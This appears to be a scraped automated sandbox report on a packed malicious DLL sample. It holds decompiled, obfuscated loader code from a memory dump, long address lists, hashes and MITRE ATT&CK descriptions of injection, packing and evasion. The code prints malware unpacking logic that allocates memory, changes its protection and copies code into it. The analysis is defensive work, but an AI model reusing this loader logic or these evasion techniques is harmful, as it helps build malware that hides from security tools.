					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E03044E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E03042FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x03045f16
0x03045f16
0x03045f16
0x03045f17
0x03045f1b
0x03045f1e
0x03045f20
0x03045f23
0x03045f24
0x03045f28
0x03045f2b
0x03045f2c
0x03045f30
0x03045f39
0x03045f3a
0x03045f3d
0x03045f46
0x03045f4a
0x03045f4d
0x03045f56
0x03045f57
0x03045f5a
0x03045f5d
0x03045f63
0x03045f66
0x03045f6e
0x03045f71
0x03045f72
0x03045f75
0x03045f78
0x03045f7b
0x03045f84
0x03045f85
0x03045f88
0x03045f8b
0x03045f91
0x03045f94
0x03045f9d
0x03045f9e
0x03045fa2
0x03045fa5
0x03045fab
0x03045fb1
0x03045fb5
0x03045fb8
0x03045fbb
0x03045fbe
0x03045fc0
0x03045fcb
0x03045fd2
0x03045fda
0x03045fdd
0x03045fe6
0x03045fe7
0x03045fea
0x03045ff3
0x03045ff4
0x03045ff7
0x03045ffa
0x03045ffa
0x03046002
0x03046005
0x03046009
0x0304600d
0x03046017
0x0304601b
0x03046025
0x03046029
0x0304602c
0x03046032
0x03046039
0x0304604b
0x03046054
0x0304605e
0x03046067
0x03046068
0x0304606b
0x0304606e
0x03046074
0x0304607b
0x0304607e
0x03046088
0x0304608b
0x03046094
0x03046095
0x03046098
0x0304609b
0x030460a1
0x030460a7
0x030460ae
0x030460b7
0x030460be
0x030460c1
0x030460c8
0x030460cb
0x030460d4
0x030460db
0x030460de
0x030460e4
0x030460e7
0x030460ee
0x030460f1
0x030460f4
0x030460f7
0x030460f8
0x03046106
0x03046108
0x0304610b
0x03046114
0x03046118
0x03046124
0x03046127
0x0304612d
0x03046133
0x0304613a
0x03046140
0x03046147
0x0304614a
0x0304614f
0x03046156
0x0304615c
0x0304615f
0x03046162
0x0304616b
0x0304616e
0x03046172
0x03046176
0x0304617a
0x0304617e
0x03046188
0x0304618c
0x03046195
0x0304619c
0x0304619f
0x030461ab
0x030461b2
0x030461be
0x030461c1
0x030461c8
0x030461d1
0x030461db
0x030461de
0x030461e5
0x030461e8
0x030461f1
0x030461fb
0x030461fe
0x03046206
0x03046209
0x03046210
0x03046213
0x03046216
0x03046219
0x0304621a
0x0304621b
0x03046231
0x03046239
0x03046240
0x03046249
0x03046253
0x03046256
0x03046256
0x0304625e
0x03046265
0x0304626b
0x0304626c
0x03046276
0x03046279
0x03046283
0x0304628c
0x03046296
0x03046299
0x0304629f
0x030462a9
0x030462b5
0x030462b8
0x030462c3
0x030462c6
0x030462cd
0x030462ce
0x030462d1
0x030462d2
0x030462dd
0x030462df
0x030462e4
0x030462ec
0x030462f6
0x03046300
0x03046303
0x03046306
0x0304630c
0x03046314
0x0304631b
0x03046321
0x03046321
0x0304632a
0x0304632d
0x03046335
0x03046338
0x0304633b
0x0304633e
0x0304633f
0x03046343
0x0304634d
0x03046351
0x0304635d
0x03046360
0x03046368
0x0304636f
0x03046375
0x0304637c
0x0304637f
0x03046385
0x03046389
0x0304638c
0x03046396
0x03046399
0x030463a2
0x030463a9
0x030463ac
0x030463b4
0x030463bb
0x030463c1
0x030463c7
0x030463ca
0x030463d1
0x030463d3
0x030463dc
0x030463e6
0x030463e9
0x030463f0
0x030463f3
0x030463fd
0x03046400
0x03046403
0x03046412
0x03046417
0x0304641b
0x0304641e
0x03046420
0x03046421
0x0304642c
0x0304642e
0x03046433
0x0304643c
0x0304643f
0x03046448
0x03046452
0x03046455
0x03046455
0x03046461
0x03046468
0x0304646e
0x03046474
0x03046477
0x03046483
0x03046486
0x0304648c
0x03046494
0x0304649b
0x030464a1
0x030464a6
0x030464b2
0x030464b6
0x030464b9
0x030464c1
0x030464c5
0x030464c8
0x030464d4
0x030464db
0x030464e1
0x030464e3
0x030464e6
0x030464f2
0x030464f5
0x030464fe
0x0304650a
0x0304650d
0x03046515
0x03046518
0x0304651f
0x03046522
0x03046525
0x03046528
0x03046529
0x03046537
0x03046539
0x0304653c
0x0304653e
0x03046544
0x0304654e
0x03046551
0x03046558
0x0304655c
0x0304655f
0x0304655f
0x03046567
0x0304656e
0x03046574
0x03046575
0x03046586
0x03046590
0x03046593
0x0304659a
0x0304659e
0x030465a1
0x030465a9
0x030465b0
0x030465b6
0x030465b7
0x030465ca
0x030465cc
0x030465ce
0x030465d2
0x030465d5
0x030465db
0x030465e5
0x030465e8
0x030465ee
0x030465f6
0x030465fd
0x03046603
0x0304660b
0x03046610
0x03046618
0x0304661b
0x03046622
0x03046625
0x0304662b
0x03046632
0x03046635
0x0304663c
0x03046640
0x03046643
0x0304664a
0x0304664e
0x03046651
0x03046659
0x0304665f
0x03046666
0x03046667
0x0304666a
0x0304666b
0x03046671
0x03046674
0x03046677
0x0304667a
0x03046685
0x0304668f
0x03046693
0x03046696
0x0304669d
0x030466a0
0x030466a3
0x030466a3
0x030466a9
0x030466ac
0x030466af
0x030466c2
0x030466c6
0x030466c9
0x030466d2
0x030466dc
0x030466e8
0x030466eb
0x030466f1
0x030466f8
0x030466fe
0x03046703
0x03046706
0x0304670b
0x0304670e
0x03046713
0x0304671a
0x0304671d
0x03046720
0x03046727
0x03046730
0x0304673a
0x0304673d
0x03046743
0x0304674d
0x03046757
0x0304675b
0x0304675e
0x0304676d
0x03046774
0x03046777
0x0304677a
0x0304677d
0x0304677e
0x0304677f
0x03046781
0x0304678c
0x03046791
0x0304679a
0x0304679d
0x030467a7
0x030467ab
0x030467ae
0x030467b4
0x030467b6
0x030467bd
0x030467c3
0x030467c4
0x030467c7
0x030467cc
0x030467cf
0x030467d2
0x030467d2
0x030467d3
0x030467dd
0x030467e0
0x030467e7
0x030467f1
0x030467f4
0x030467f7
0x030467fe
0x03046801
0x0304680b
0x0304680f
0x03046812
0x0304681d
0x03046824
0x03046827
0x0304682a
0x0304682d
0x0304682e
0x0304682f
0x03046841
0x0304684c
0x03046858
0x0304685b
0x03046861
0x03046868
0x0304686e
0x03046873
0x03046876
0x0304687e
0x03046881
0x03046881
0x03046889
0x0304688d
0x03046897
0x0304689b
0x030468a4
0x030468ae
0x030468b1
0x030468bd
0x030468c4
0x030468cd
0x030468d0
0x030468d3
0x030468e0
0x030468e4
0x030468e7
0x030468f0
0x030468f7
0x03046900
0x03046901
0x03046904
0x03046907
0x03046913
0x03046916
0x03046919
0x03046926
0x0304692f
0x03046939
0x0304693c
0x03046945
0x03046951
0x03046954
0x03046960
0x03046968
0x0304696c
0x03046971
0x03046972
0x0304697d
0x0304697f
0x03046984
0x03046986
0x0304698d
0x03046990
0x03046993
0x0304699a
0x0304699d
0x030469a0
0x030469a6
0x030469ae
0x030469b5
0x030469bb
0x030469c0
0x030469c3
0x030469c6
0x030469cd
0x030469d0
0x030469d6
0x030469d9
0x030469e0
0x030469e4
0x030469e7
0x030469f0
0x030469f3
0x030469fb
0x03046a02
0x03046a08
0x03046a0b
0x03046a0e
0x03046a13
0x03046a1a
0x03046a1e
0x03046a24
0x03046a27
0x03046a30
0x03046a33
0x03046a3f
0x03046a46
0x03046a4f
0x03046a52
0x03046a56
0x03046a5d
0x03046a64
0x03046a67
0x03046a6e
0x03046a72
0x03046a75
0x03046a7c
0x03046a80
0x03046a83
0x03046a8a
0x03046a8d
0x03046a90
0x03046a9f
0x03046aa6
0x03046aa9
0x03046aac
0x03046aaf
0x03046ab0
0x03046ab3
0x03046abe
0x03046ac0
0x03046ac3
0x03046ac5
0x03046acc
0x03046acf
0x03046ad2
0x03046ad9
0x03046adc
0x03046adf
0x03046ae5
0x03046aec
0x03046af2
0x03046af2
0x03046af5
0x03046af8
0x03046afc
0x03046aff
0x03046b02
0x03046b09
0x03046b0c
0x03046b0f
0x03046b17
0x03046b1e
0x03046b24
0x03046b25
0x03046b2c
0x03046b2f
0x03046b35
0x03046b3f
0x03046b42
0x03046b49
0x03046b4c
0x03046b4f
0x03046b55
0x03046b5c
0x03046b62
0x03046b65
0x03046b6b
0x03046b71
0x03046b7b
0x03046b7e
0x03046b85
0x03046b88
0x03046b8b
0x03046b91
0x03046b99
0x03046ba0
0x03046ba6
0x03046ba6
0x03046baf
0x03046bbb
0x03046bc5
0x03046bcf
0x03046bd2
0x03046bd5
0x03046bdb
0x03046be2
0x03046be8
0x03046bf4
0x03046bf6
0x03046bfd
0x03046c07
0x03046c10
0x03046c17
0x03046c20
0x03046c21
0x03046c24
0x03046c27
0x03046c2d
0x03046c30
0x03046c3a
0x03046c3d
0x03046c40
0x03046c46
0x03046c4d
0x03046c59
0x03046c5c
0x03046c6b
0x03046c72
0x03046c75
0x03046c78
0x03046c7b
0x03046c7c
0x03046c7d
0x03046c88
0x03046c8a
0x03046c8f
0x03046c98
0x03046c9b
0x03046ca5
0x03046ca9
0x03046cac
0x03046cac
0x03046cb4
0x03046cbb
0x03046cc2
0x03046ccc
0x03046cd5
0x03046cdc
0x03046cdf
0x03046ce8
0x03046cf1
0x03046cf8
0x03046cfb
0x03046d06
0x03046d09
0x03046d10
0x03046d11
0x03046d14
0x03046d15
0x03046d1b
0x03046d1e
0x03046d21
0x03046d24
0x03046d2d
0x03046d30
0x03046d39
0x03046d40
0x03046d43
0x03046d43
0x03046d49
0x03046d51
0x03046d58
0x03046d63
0x03046d6b
0x03046d6d
0x03046d6f
0x03046d73
0x03046d7c
0x03046d86
0x03046d90
0x03046d93
0x03046d96
0x03046d9c
0x03046da4
0x03046dab
0x03046db1
0x03046dba
0x03046dc4
0x03046dc5
0x03046dc8
0x03046dcb
0x03046dce
0x03046dcf
0x03046dd0
0x03046dda
0x03046de4
0x03046de8
0x03046df1
0x03046dfb
0x03046dfe
0x03046e06
0x03046e0d
0x03046e13
0x03046e16
0x03046e19
0x03046e1c
0x03046e20
0x03046e24
0x03046e2e
0x03046e31
0x03046e34
0x03046e3b
0x03046e3e
0x03046e48
0x03046e4b
0x03046e4e
0x03046e5a
0x03046e62
0x03046e66
0x03046e6b
0x03046e6c
0x03046e72
0x03046e75
0x03046e78
0x03046e7b
0x03046e7d
0x03046e84
0x03046e87
0x03046e8a
0x03046e91
0x03046e94
0x03046e97
0x03046e9d
0x03046ea4
0x03046eaa
0x03046eaa
0x03046eb9
0x03046ec8
0x03046ec9
0x03046ec9
0x03046ec9
0x03046ed4
0x03046ed7
0x03046ee0
0x03046ee2
0x03046ee3
0x03046ee3
0x03046ee3
0x03046eec
0x03046eef
0x03046ef2
0x03046f07
0x03046f0a
0x03046f0d
0x03046f10
0x03046f11
0x03046f14
0x03046f1b
0x03046f21
0x03046f22
0x03046f31
0x03046f33
0x03046f39
0x03046f3c
0x03046f40
0x03046f43
0x03046f4b
0x03046f4e
0x03046f4e
0x03046f61
0x03046f68

APIs

VirtualProtect.KERNELBASE ref: 03046B65

Memory Dump Source

Source File: 00000004.00000002.254266250.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: 6b0df02bcf021959dd5f499e0aadfb8b9db473cd75b2cdf422c693678c1e5884
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: DEC21372844608EFEB049FA0C8C57EEBBF5FF48320F0989ADD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0304709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0304709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E03042D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E0304746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E03042A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E03045F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E03048F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x0304709d
0x0304709d
0x0304709d
0x0304709d
0x0304709e
0x030470a5
0x030470ab
0x030470ae
0x030470af
0x030470b2
0x030470b6
0x030470ba
0x030470c1
0x030470cb
0x030470d0
0x030470d0
0x030470d6
0x030470dd
0x030470e0
0x030470e3
0x030470e9
0x030470f5
0x030470fc
0x03047102
0x0304710a
0x0304710c
0x03047112
0x03047119
0x0304711d
0x0304712b
0x0304712b
0x03047135
0x03047138
0x03047138
0x0304713e
0x03047146
0x0304714a
0x0304714b
0x03047153
0x03047157
0x03047158
0x0304715d
0x03047163
0x03047166
0x03047169
0x0304716c
0x03047179
0x0304717d
0x0304717f
0x03047181
0x03047182
0x03047184
0x0304718e
0x03047191
0x03047191
0x0304719d
0x0304719e
0x0304719e
0x0304719e
0x030471a6
0x030471a8
0x030471b0
0x030471b4
0x030471b5
0x030471ba
0x030471c2
0x030471c6
0x030471c7
0x030471c7
0x030471cc
0x030471e0
0x030471ea
0x030471f0
0x030471f1
0x030471f7
0x030471fb
0x030471ff
0x03047201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 030470D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 03047138

Memory Dump Source

Source File: 00000004.00000002.254266250.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: e69c0a1cc47de0611f7001b7290148db7c09a0eafb9069c20b63a8b05b5d0b32
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 084171B2505304EFEB04DF54C8857AEBBF5EF88710F09846DEC88AB255C7741950DB69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

